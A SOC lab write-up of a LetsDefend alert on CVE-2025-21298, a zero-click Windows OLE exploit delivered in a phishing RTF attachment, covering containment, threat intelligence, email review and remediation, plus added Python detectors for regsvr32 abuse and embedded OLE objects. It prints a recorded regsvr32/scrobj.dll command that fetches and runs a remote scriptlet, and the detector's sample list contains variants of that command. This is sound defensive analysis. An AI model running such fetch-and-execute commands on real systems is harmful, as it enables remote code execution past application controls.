LetsDefend SOC336 – Windows OLE Zero-Click RCE (CVE-2025-21298) Analysis
Alert Name: SOC336 – Windows OLE Zero-Click RCE Exploitation Detected
Severity: Critical
Event ID: 314
Event Time: Feb 04, 2025, 04:18 PM
Category: Malware
Base Information
| Field | Value |
|---|---|
| Severity | Critical |
| Event ID | 314 |
| Event Time | Feb 04, 2025, 04:18 PM |
| Rule Name | SOC336 – Windows OLE Zero-Click RCE Exploitation Detected |
| CVE | CVE-2025-21298 |
| Analyst Level | Security Analyst |
| Source IP / SMTP Address | 84.38.130.118 |
| Sender Email | projectmanagement@pm.me |
| Recipient Email | Austin@letsdefend.io |
| Email Subject | Important: Action Required for Upcoming Project Deadline |
| Attachment Name | mail.rtf |
| Attachment Hash (SHA-256) | df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184 |
| Device Action | Allowed |
| Trigger Reason | Malicious RTF attachment matching CVE-2025-21298 exploit pattern |
Basic Context
Windows OLE (Object Linking and Embedding) is the Microsoft technology that lets a document embed or link objects from other applications; RTF carries such objects as hex-encoded OLE data inside `\objdata` groups. CVE-2025-21298 is a remote code execution flaw in Windows OLE that Microsoft rates as reachable through Outlook's Preview Pane, so merely rendering a malicious message or its attachment can trigger it. No click on the attachment is needed, which is why this class of exploit is called zero-click.
Key details recorded before investigation:
- Event Time: Feb 04, 2025, 04:18 PM
- Sender: projectmanagement@pm.me
- Recipient: Austin@letsdefend.io
- Attachment: mail.rtf
- Attachment Hash: df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184
Play Book
Initial Containment and Host Review
Endpoint details for the affected system:
- Hostname: Austin
- Domain: LetsDefend
- IP Address: 172.16.17.137
- OS: Windows 10 (64-bit)
- Primary User: Austin
- Role: Server
- Last Login: Feb 04, 2025, 04:33 PM
The endpoint was immediately placed under containment to prevent further execution or lateral movement during the investigation.

Command Execution Observed
Terminal history revealed the following command execution:
```text
C:\Windows\System32\cmd.exe /c regsvr32.exe /s /u /i:http://84.38.130.118.com/shell.sct scrobj.dll
```
This is the well-known regsvr32 scriptlet technique (often called Squiblydoo; MITRE ATT&CK T1218.010). regsvr32.exe is a signed Microsoft binary, so it runs under most application-control allowlists; `/i:<url>` is passed to the DLL's DllInstall export, and scrobj.dll's DllInstall fetches and executes the COM scriptlet at that URL. `/u` (unregister) means DllRegisterServer is never called and DllInstall runs with its uninstall flag, which scrobj.dll still honours; `/s` suppresses error dialogs; no traditional executable is written to disk. Note that the host in the recorded command is `84.38.130.118.com`, a hostname, not the sender IP 84.38.130.118 listed in the alert: treat both as indicators and block both.
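The following detection logic is an added example written for this write-up, not part of the LetsDefend playbook. It scores process command lines for the regsvr32 scriptlet pattern described above (DllInstall argument that is a URL or a `.sct` file, scrobj.dll on the command line, `/n` or `/u` combined with `/i:`, `/s` to hide errors) and extracts the remote host as an indicator. The first sample line mirrors the command recorded on this page; the remaining sample lines are constructed to show a benign registration, a `-` switch variant, a local scriptlet, and a non-regsvr32 command.

```python
from __future__ import annotations

import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Constructed sample command lines in the shape an EDR / Sysmon Event ID 1
# feed would carry. Only the first one comes from the page's telemetry.
SAMPLE_CMDLINES = [
    r'C:\Windows\System32\cmd.exe /c regsvr32.exe /s /u /i:http://84.38.130.118.com/shell.sct scrobj.dll',
    r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"',
    r'REGSVR32 -n -i:"https://example.invalid/update.sct" scrobj.dll',
    r'regsvr32.exe /s /i:C:\Users\Public\evil.sct scrobj.dll',
    r'C:\Windows\System32\cmd.exe /c dir',
]

# regsvr32 at the start of the line or after a path separator / space / quote.
REGSVR32_RE = re.compile(r'(?:^|[\\\s"\'])regsvr32(?:\.exe)?\b', re.IGNORECASE)
# /i:<value> or -i:<value>; the value may be double-quoted.
INSTALL_RE = re.compile(r'[/-]i:(?:"([^"]*)"|(\S+))', re.IGNORECASE)
# Single-letter switches we care about: /s silent, /n no DllRegisterServer, /u unregister.
SWITCH_RE = re.compile(r'(?:^|\s)[/-]([snu])\b', re.IGNORECASE)


@dataclass
class Regsvr32Finding:
    cmdline: str
    install_arg: str | None = None
    host: str | None = None            # remote host from the /i: URL, for blocking
    switches: set[str] = field(default_factory=set)
    reasons: list[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def analyze_regsvr32(cmdline: str) -> Regsvr32Finding | None:
    """Return a finding for any regsvr32 invocation (None otherwise).
    `reasons` is non-empty when the scriptlet technique is indicated."""
    if not REGSVR32_RE.search(cmdline):
        return None
    f = Regsvr32Finding(cmdline=cmdline)
    f.switches = {m.group(1).lower() for m in SWITCH_RE.finditer(cmdline)}
    m = INSTALL_RE.search(cmdline)
    if m:
        f.install_arg = m.group(1) if m.group(1) is not None else m.group(2)
        parsed = urlparse(f.install_arg)
        if parsed.scheme.lower() in ("http", "https", "ftp"):
            f.host = parsed.hostname
            f.reasons.append("DllInstall argument is a remote URL")
        if f.install_arg.lower().endswith(".sct"):
            f.reasons.append("DllInstall argument is a scriptlet (.sct)")
    if "scrobj.dll" in cmdline.lower():
        f.reasons.append("scrobj.dll loaded: COM scriptlet runtime")
    if f.install_arg and ("n" in f.switches or "u" in f.switches):
        f.reasons.append("/n or /u with /i: DllRegisterServer skipped, only DllInstall runs")
    if f.suspicious and "s" in f.switches:
        f.reasons.append("/s suppresses error dialogs")
    return f


def triage(cmdlines) -> list[Regsvr32Finding]:
    """Keep only the suspicious regsvr32 invocations from a batch of command lines."""
    return [f for c in cmdlines if (f := analyze_regsvr32(c)) and f.suspicious]


if __name__ == "__main__":
    for hit in triage(SAMPLE_CMDLINES):
        print(hit.cmdline)
        for r in hit.reasons:
            print("   -", r)
        if hit.host:
            print("   IOC host:", hit.host)
```

A benign `regsvr32.exe /s vendor.dll` still yields a finding object, so the same function can feed an allowlist review, but it is not reported by `triage` because no reason fires; a local `.sct` with scrobj.dll is still reported even though there is no remote host to block.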

Malware Analysis
The attachment hash was analyzed using multiple threat intelligence platforms.
- VirusTotal: Multiple detections confirming malicious behavior
- URLHaus: Associated with active malicious infrastructure
- IBM X-Force Exchange: Classified as malware exploiting Windows OLE
Analysis confirms the RTF document weaponized a Windows OLE vulnerability to trigger remote code execution, leading to the regsvr32-based payload execution.
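A static triage pass over the attachment is the check a practitioner would run before trusting reputation verdicts alone. The block below is an added example, not code from the page or from LetsDefend: it reimplements the core of what tools such as oletools' rtfobj do, pulling each `\objdata` hex blob out of an RTF, parsing the OLE 1.0 object header (MS-OLEDS ObjectHeader / EmbeddedObject layout: version, format ID, length-prefixed class name, then native data size and data) and flagging objects paired with auto-trigger control words such as `\objupdate`, which make the object render on open or preview, the zero-click characteristic discussed in the Basic Context section. The sample RTF is constructed inline with a `Package` class object for demonstration; the real `mail.rtf` is not reproduced here and its object class is not stated on the page.

```python
from __future__ import annotations

import re
import struct
from dataclasses import dataclass, field

# RTF control words that make an embedded/linked object refresh as soon as the
# document is rendered, i.e. without any click on the object.
AUTO_TRIGGER_WORDS = (b"\\objupdate", b"\\objautlink")
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9A-Fa-f\s]+)")
CFB_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # OLE compound file header


@dataclass
class OleObject:
    format_id: int          # 2 = embedded, 1 = linked (MS-OLEDS ObjectHeader)
    class_name: str
    native_size: int
    native_head: bytes      # first 8 bytes of the native data (magic check)


@dataclass
class RtfTriage:
    is_rtf: bool
    objects: list[OleObject] = field(default_factory=list)
    triggers: list[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # Heuristic: an OLE object that auto-renders is the shape of a zero-click lure.
        return self.is_rtf and bool(self.objects) and bool(self.triggers)


def _lp_string(buf: bytes, off: int) -> tuple[str, int]:
    """LengthPrefixedAnsiString: 4-byte length (including NUL) then the bytes."""
    (n,) = struct.unpack_from("<I", buf, off)
    off += 4
    raw = buf[off:off + n]
    return raw.split(b"\x00", 1)[0].decode("latin-1"), off + n


def parse_ole1_object(data: bytes) -> OleObject | None:
    """Parse the OLE 1.0 object carried in an RTF \\objdata blob."""
    try:
        _version, fmt = struct.unpack_from("<II", data, 0)
        off = 8
        class_name, off = _lp_string(data, off)
        _topic, off = _lp_string(data, off)
        _item, off = _lp_string(data, off)
        size, head = 0, b""
        if fmt == 2:  # EmbeddedObject: NativeDataSize then NativeData follow the header
            (size,) = struct.unpack_from("<I", data, off)
            off += 4
            head = data[off:off + min(size, 8)]
    except struct.error:
        return None   # truncated or malformed header
    return OleObject(fmt, class_name, size, head)


def triage_rtf(data: bytes) -> RtfTriage:
    # Malicious RTFs often use a truncated "{\rt" header, which Word still accepts.
    t = RtfTriage(is_rtf=data.lstrip().startswith(b"{\\rt"))
    if not t.is_rtf:
        return t
    t.triggers = [w.decode() for w in AUTO_TRIGGER_WORDS if w in data]
    for m in OBJDATA_RE.finditer(data):
        hexchars = re.sub(rb"\s", b"", m.group(1))
        blob = bytes.fromhex(hexchars[: len(hexchars) & ~1].decode("ascii"))
        obj = parse_ole1_object(blob)
        if obj is not None:
            t.objects.append(obj)
    return t


# --- constructed sample input (not the page's mail.rtf) ---------------------
def _lp(s: bytes) -> bytes:
    s += b"\x00"
    return struct.pack("<I", len(s)) + s


def build_embedded_object(class_name: bytes, native: bytes) -> bytes:
    """Build a MS-OLEDS EmbeddedObject exactly as \\objdata carries it (hex-encoded)."""
    return (struct.pack("<II", 0x00000501, 2) + _lp(class_name) + _lp(b"") + _lp(b"")
            + struct.pack("<I", len(native)) + native)


_NATIVE = CFB_MAGIC + b"\x00" * 32   # stand-in for an embedded compound file
SAMPLE_RTF = (b"{\\rtf1\\ansi{\\object\\objemb\\objupdate{\\*\\objclass Package}"
              b"{\\*\\objdata " + build_embedded_object(b"Package", _NATIVE).hex().encode() + b"}}}")
BENIGN_RTF = b"{\\rtf1\\ansi Hello, project team.\\par}"

if __name__ == "__main__":
    for name, doc in (("sample", SAMPLE_RTF), ("benign", BENIGN_RTF)):
        t = triage_rtf(doc)
        print(name, "suspicious:", t.suspicious, "triggers:", t.triggers)
        for o in t.objects:
            print("   class:", o.class_name, "native bytes:", o.native_size,
                  "compound file:", o.native_head.startswith(CFB_MAGIC))
```

The class name and native-data magic are what you would pivot on next: an object whose native data is a compound file or a `Package` wrapper is where the exploit or a dropped payload lives, and the SHA-256 of that inner blob is a better hunting indicator than the hash of the outer RTF, which attackers can churn by editing harmless text.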

Email Analysis
Email investigation showed:
- No additional emails from the same sender to other users in this tenant
- No evidence of the recipient forwarding the email internally
- No outbound emails originating from Austin related to this message
Within this organisation's mail flow this points to a targeted phishing attempt rather than a broad campaign; it says nothing about whether the same sender targeted other organisations.

Impact Assessment
- Attack Type: Zero-click remote code execution
- Exploitation Success: Yes
- Initial Access Vector: Malicious RTF email attachment
- Code Execution: Confirmed via regsvr32 abuse
- Lateral Movement: Not observed
- Persistence: Possible; further forensic analysis required (Run/RunOnce keys, scheduled tasks, services and WMI event subscriptions created around 04:18 PM, and any further regsvr32 or scrobj.dll activity after containment)
Conclusion
This incident represents a successful exploitation of CVE-2025-21298 using a malicious RTF document leveraging Windows OLE. The attacker achieved remote code execution without requiring user interaction. The affected system was contained promptly, and no lateral spread was observed; however, environment-wide hunting and forensic analysis are still required: confirm that the January 2025 security update addressing CVE-2025-21298 is installed on this host and across the fleet, search proxy and DNS logs for 84.38.130.118 and 84.38.130.118.com, hunt for other regsvr32 executions with a `/i:` URL argument, and, until patching is verified, apply Microsoft's interim mitigation of configuring Outlook to read all messages in plain text.
Final Verdict
True Positive – Confirmed Zero-Click RCE Exploitation
The alert accurately detected a critical zero-click Windows OLE remote code execution attack. Immediate containment was successful, but full remediation and threat hunting across the environment are required.